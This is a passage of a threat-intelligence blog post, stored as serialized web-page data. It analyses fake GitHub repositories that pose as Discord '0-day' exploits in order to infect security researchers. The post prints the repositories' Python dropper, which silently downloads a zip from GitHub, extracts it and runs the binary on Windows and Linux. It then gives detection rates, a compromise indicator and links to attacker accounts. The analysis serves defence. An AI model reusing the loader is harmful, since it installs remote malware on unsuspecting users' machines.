The above Discord “0-day” uses the following code to perform these actions:"}]},{type:a,tag:S,props:{className:["language-python"],code:"if __name__ == '__main__':\n    if os.name == 'nt':\n        try:\n            namezip = \"cveswindows.zip\"\n            name    = \"cveswindows\"\n            url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip\"\n            des = os.path.join(os.environ['TMP'], namezip)\n            if not os.path.exists(os.path.join(os.environ['TMP'], name, name + \".exe\")):\n                urllib.request.urlretrieve(url, des)\n                with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n                zf = ZipFile(des, 'r')\n                zf.extractall(os.path.join(os.environ['TMP'], name))\n                zf.close()\n                pid = subprocess.Popen([os.path.join(os.environ['TMP'], name, name + \".exe\")], creationflags=0x00000008 | subprocess.CREATE_NO_WINDOW).pid\n        except:\n            pass\n    else:\n        url = \"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip\"\n        namezip = \"cveslinux.zip\"\n        name    = \"cveslinux\"\n\n        des = os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", namezip)\n        if not os.path.exists(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)):\n            urllib.request.urlretrieve(url, des)\n            with open(des, 'wb') as f: f.write(urllib.request.urlopen(url).read())\n            zf = ZipFile(des, 'r')\n            zf.extractall(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name))\n            zf.close()\n            st = os.stat(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name))\n        
    os.chmod(os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name), st.st_mode | stat.S_IEXEC)\n            subprocess.Popen([\"\u002Fbin\u002Fbash\", \"-c\", os.path.join(\"\u002Fhome\u002F\" + os.environ[\"USERNAME\"] + \"\u002F.local\u002Fshare\", name, name)], start_new_session=True, stdout=subprocess.DEVNULL, stderr=subprocess.STDOUT)\n\n\n    main()\n",language:T,meta:r},children:[{type:a,tag:"pre",props:{},children:[{type:a,tag:S,props:{__ignoreMap:r},children:[{type:a,tag:c,props:{class:j,line:U},children:[{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:"ct-869604"},children:[{type:b,value:"__name__"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:V}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"'__main__'"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:H},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:W}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.name "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:V}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"'nt'"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:D},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:I}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"try"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:X},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            namezip 
"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveswindows.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:5},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            name    "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveswindows\"\n"}]}]},{type:a,tag:c,props:{class:j,line:6},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            url "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveswindows.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:7},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            des "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:"], namezip)\n"}]}]},{type:a,tag:c,props:{class:j,line:8},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:J}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:Y}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" 
os.path.exists(os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:Z}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:_}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:")):\n"}]}]},{type:a,tag:c,props:{class:j,line:9},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                urllib.request.urlretrieve(url, des)\n"}]}]},{type:a,tag:c,props:{class:j,line:10},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:$}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:aa},children:[{type:b,value:ab}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ac}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ad}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ae}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:af}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ag}]}]},{type:a,tag:c,props:{class:j,line:11},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                zf "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ah}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ai}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:12},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                zf.extractall(os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:"], name))\n"}]}]},{type:a,tag:c,props:{class:j,line:13},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                
zf.close()\n"}]}]},{type:a,tag:c,props:{class:j,line:14},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"                pid "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" subprocess.Popen([os.path.join(os.environ["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:E}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:Z}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:_}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:")], "}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"creationflags"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:"ct-854774"},children:[{type:b,value:"0x"}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"00000008"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:aj}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" 
subprocess."}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"CREATE_NO_WINDOW"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:").pid\n"}]}]},{type:a,tag:c,props:{class:j,line:15},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:I}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"except"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:16},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:J}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"pass\n"}]}]},{type:a,tag:c,props:{class:j,line:17},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:W}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:"else"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:y}]}]},{type:a,tag:c,props:{class:j,line:18},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        url "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix\u002Fraw\u002Fmain\u002Fgitignore\u002Fcveslinux.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:19},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        namezip "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveslinux.zip\"\n"}]}]},{type:a,tag:c,props:{class:j,line:20},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        name    
"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"cveslinux\"\n"}]}]},{type:a,tag:c,props:{class:j,line:21},children:[{type:a,tag:c,props:{},children:[{type:b,value:K}]}]},{type:a,tag:c,props:{class:j,line:22},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"        des "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", namezip)\n"}]}]},{type:a,tag:c,props:{class:j,line:23},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:I}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:C}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:Y}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" 
os.path.exists(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name)):\n"}]}]},{type:a,tag:c,props:{class:j,line:i},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            urllib.request.urlretrieve(url, des)\n"}]}]},{type:a,tag:c,props:{class:j,line:25},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:J}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:$}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:aa},children:[{type:b,value:ab}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ac}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ad}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ae}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:af}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ag}]}]},{type:a,tag:c,props:{class:j,line:26},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            zf "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ah}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:ai}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:27},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            
zf.extractall(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name))\n"}]}]},{type:a,tag:c,props:{class:j,line:28},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            zf.close()\n"}]}]},{type:a,tag:c,props:{class:j,line:29},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            st "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" os.stat(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name))\n"}]}]},{type:a,tag:c,props:{class:j,line:30},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            
os.chmod(os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name), st.st_mode "}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:aj}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:" stat."}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"S_IEXEC"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:31},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"            subprocess.Popen(["}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"\u002Fbin\u002Fbash\""}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:L}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:"\"-c\""}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", os.path.join("}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:t}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:u}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:v}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:w}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:q}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:k}]},{type:a,tag:c,props:{class:h},children:[{type:b,value:x}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:", name, name)], 
"}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"start_new_session"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"True"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:L}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"stdout"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ak}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"DEVNULL"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:L}]},{type:a,tag:c,props:{class:G},children:[{type:b,value:"stderr"}]},{type:a,tag:c,props:{class:g},children:[{type:b,value:o}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:ak}]},{type:a,tag:c,props:{class:s},children:[{type:b,value:"STDOUT"}]},{type:a,tag:c,props:{class:d},children:[{type:b,value:F}]}]},{type:a,tag:c,props:{class:j,line:z},children:[{type:a,tag:c,props:{},children:[{type:b,value:K}]}]},{type:a,tag:c,props:{class:j,line:33},children:[{type:a,tag:c,props:{},children:[{type:b,value:K}]}]},{type:a,tag:c,props:{class:j,line:34},children:[{type:a,tag:c,props:{class:d},children:[{type:b,value:"    main()"}]}]}]}]}]},{type:a,tag:p,props:{},children:[{type:b,value:"Above, "},{type:a,tag:B,props:{},children:[{type:b,value:R}]},{type:b,value:" downloads one of two zip files. "},{type:a,tag:B,props:{},children:[{type:b,value:"cveslinux.zip"}]},{type:b,value:" or "},{type:a,tag:B,props:{},children:[{type:b,value:"cveswindows.zip"}]},{type:b,value:" are fetched from GitHub, unzipped, written to disk, and executed. The Windows binary has a very high detection rate on VirusTotal ("},{type:a,tag:l,props:{href:"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F777c9220670025a487f4e853987df0482fbd545189137d58a60d4ab37c1cfbb4",rel:[m]},children:[{type:b,value:"43\u002F71"}]},{type:b,value:"). 
The Linux binary is flagged far less often ("},{type:a,tag:l,props:{href:"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fba4be87b3747e6c009c3aa9c9f28ce4331cd3fe2bd0d332283f226d747698733\u002Fdetection",rel:[m]},children:[{type:b,value:"3\u002F62"}]},{type:b,value:"), but it contains some very obvious strings indicating its nature, so a low detection count should not be read as a sign that a file is benign."}]},{type:a,tag:p,props:{},children:[{type:a,tag:A,props:{alt:Q,src:"\u002Fblog\u002Ffake-repos-deliver-malicious-implant\u002Fghidra.png"},children:[]}]},{type:a,tag:p,props:{},children:[{type:b,value:"The attacker has put a lot of effort into creating all these fake personas, only to deliver very obvious malware. It’s unclear if they have been successful, but given that they’ve continued to pursue this avenue of attack, it seems they believe they "},{type:a,tag:"em",props:{},children:[{type:b,value:"will"}]},{type:b,value:" be successful."}]},{type:a,tag:p,props:{},children:[{type:b,value:"It isn’t clear if this is a single individual with too much time on their hands, or something more advanced like the campaign uncovered by "},{type:a,tag:l,props:{href:"https:\u002F\u002Fblog.google\u002Fthreat-analysis-group\u002Fnew-campaign-targeting-security-researchers\u002F",rel:[m]},children:[{type:b,value:"Google TAG in January 2021"}]},{type:b,value:". Either way, security researchers should understand that they are useful targets for malicious actors and should be careful when downloading code from GitHub. 
Always review the code you are executing and don’t use anything you don’t understand."}]},{type:a,tag:p,props:{},children:[{type:b,value:"If you have engaged with any of the following accounts, consider the possibility that you’ve been compromised. For the Discord sample shown above, the script extracts its payload into a cveswindows folder under the TMP directory on Windows, or a cveslinux folder under the user’s .local\u002Fshare directory on Linux, so the presence of either folder is a quick first check."}]},{type:a,tag:M,props:{id:al},children:[{type:b,value:am}]},{type:a,tag:N,props:{},children:[{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:an,rel:[m]},children:[{type:b,value:an}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ao,rel:[m]},children:[{type:b,value:ao}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ap,rel:[m]},children:[{type:b,value:ap}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aq,rel:[m]},children:[{type:b,value:aq}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ar,rel:[m]},children:[{type:b,value:ar}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:as,rel:[m]},children:[{type:b,value:as}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:at,rel:[m]},children:[{type:b,value:at}]}]}]},{type:a,tag:M,props:{id:au},children:[{type:b,value:av}]},{type:a,tag:N,props:{},children:[{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aw,rel:[m]},children:[{type:b,value:aw}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ax,rel:[m]},children:[{type:b,value:ax}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:ay,rel:[m]},children:[{type:b,value:ay}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:az,rel:[m]},children:[{type:b,value:az}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aA,rel:[m]},children:[{type:b,value:aA}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aB,rel:[m]},children:[{type:b,value:aB}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aC,rel:[m]},children:[{type:b,value:aC}]}]}]},{type:a,tag:M,props:{id:aD},children:[{type:b,value:aE}]},{type:a,tag:N,props:{},children:[{type:a,tag:n,props:{},child
ren:[{type:a,tag:l,props:{href:aF,rel:[m]},children:[{type:b,value:aF}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aG,rel:[m]},children:[{type:b,value:aG}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aH,rel:[m]},children:[{type:b,value:aH}]}]},{type:a,tag:n,props:{},children:[{type:a,tag:l,props:{href:aI,rel:[m]},children:[{type:b,value:aI}]}]}]},{type:a,tag:"style",children:[{type:b,value:".ct-794887{color:#CF222E;}\n.dark .ct-794887{color:#FF7B72;}\n.sepia .ct-794887{color:#F92672;}\n.ct-836158{color:#24292F;}\n.dark .ct-836158{color:#C9D1D9;}\n.sepia .ct-836158{color:#F8F8F2;}\n.ct-869604{color:#0550AE;}\n.dark .ct-869604{color:#79C0FF;}\n.sepia .ct-869604{color:#F8F8F2;}\n.ct-169668{color:#0A3069;}\n.dark .ct-169668{color:#A5D6FF;}\n.sepia .ct-169668{color:#E6DB74;}\n.ct-363298{color:#0550AE;}\n.dark .ct-363298{color:#79C0FF;}\n.sepia .ct-363298{color:#66D9EF;}\n.ct-402719{color:#953800;}\n.dark .ct-402719{color:#FFA657;}\n.sepia .ct-402719{color:#FD971F;font-style:italic;}\n.ct-854774{color:#CF222E;}\n.dark .ct-854774{color:#FF7B72;}\n.sepia .ct-854774{color:#66D9EF;font-style:italic;}\n.ct-360247{color:#0550AE;}\n.dark .ct-360247{color:#79C0FF;}\n.sepia .ct-360247{color:#AE81FF;}"}]}],toc:{title:r,searchDepth:H,depth:H,links:[{id:al,depth:D,text:am},{id:au,depth:D,text:av},{id:aD,depth:D,text:aE}]}},_type:"markdown",_id:"content:blog:fake-repos-deliver-malicious-implant.md",_source:"content",_file:"blog\u002Ffake-repos-deliver-malicious-implant.md",_extension:"md"}},state:{"$scolor-mode":{preference:aJ,value:aJ,unknown:O,forced:f},$snotifications:[],$sicons:{"bx:bx-menu":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M4 6h16v2H4zm0 5h16v2H4zm0 5h16v2H4z\"\u002F\u003E"},"mdi:database-search":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M18.68 12.32a4.49 4.49 0 0 0-6.36.01a4.49 4.49 0 0 0 0 6.36a4.508 4.508 0 0 0 
5.57.63L21 22.39L22.39 21l-3.09-3.11c1.13-1.77.87-4.09-.62-5.57m-1.41 4.95c-.98.98-2.56.97-3.54 0c-.97-.98-.97-2.56.01-3.54c.97-.97 2.55-.97 3.53 0c.97.98.97 2.56 0 3.54M10.9 20.1a6.527 6.527 0 0 1-1.48-2.32C6.27 17.25 4 15.76 4 14v3c0 2.21 3.58 4 8 4c-.4-.26-.77-.56-1.1-.9M4 9v3c0 1.68 2.07 3.12 5 3.7v-.2c0-.93.2-1.85.58-2.69C6.34 12.3 4 10.79 4 9m8-6C7.58 3 4 4.79 4 7c0 2 3 3.68 6.85 4h.05c1.2-1.26 2.86-2 4.6-2c.91 0 1.81.19 2.64.56A3.215 3.215 0 0 0 20 7c0-2.21-3.58-4-8-4Z\"\u002F\u003E"},"bxs:skull":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 2C5.505 2 2 6.637 2 11c0 2.129 1.009 3.979 3 5.508V21h3v-3h2v3h4v-3h2v3h3v-4.493c1.991-1.528 3-3.379 3-5.507c0-4.363-3.505-9-10-9zM8 13c-1.121 0-2-1.098-2-2.5S6.879 8 8 8s2 1.098 2 2.5S9.121 13 8 13zm8 0c-1.121 0-2-1.098-2-2.5S14.879 8 16 8s2 1.098 2 2.5s-.879 2.5-2 2.5z\"\u002F\u003E"},"mdi:door-open":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 3c-1.11 0-2 .89-2 2H3v14H2v2h20v-2h-1V5c0-1.11-.89-2-2-2h-7m0 2h7v14h-7V5m-7 6h2v2H5v-2Z\"\u002F\u003E"},"ri:team-line":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 11a5 5 0 0 1 5 5v6h-2v-6a3 3 0 0 0-2.824-2.995L12 13a3 3 0 0 0-2.995 2.824L9 16v6H7v-6a5 5 0 0 1 5-5Zm-6.5 3c.279 0 .55.033.81.094a5.948 5.948 0 0 0-.301 1.575L6 16v.086a1.493 1.493 0 0 0-.356-.08L5.5 16a1.5 1.5 0 0 0-1.493 1.355L4 17.5V22H2v-4.5A3.5 3.5 0 0 1 5.5 14Zm13 0a3.5 3.5 0 0 1 3.5 3.5V22h-2v-4.5a1.5 1.5 0 0 0-1.355-1.493L18.5 16c-.175 0-.343.03-.5.085V16c0-.666-.108-1.306-.308-1.904c.258-.063.53-.096.808-.096Zm-13-6a2.5 2.5 0 1 1 0 5a2.5 2.5 0 0 1 0-5Zm13 0a2.5 2.5 0 1 1 0 5a2.5 2.5 0 0 1 0-5Zm-13 2a.5.5 0 1 0 0 1a.5.5 0 0 0 0-1Zm13 0a.5.5 0 1 0 0 1a.5.5 0 0 0 0-1ZM12 2a4 4 0 1 1 0 8a4 4 0 0 1 0-8Zm0 2a2 2 0 1 0 0 4a2 2 0 0 0 
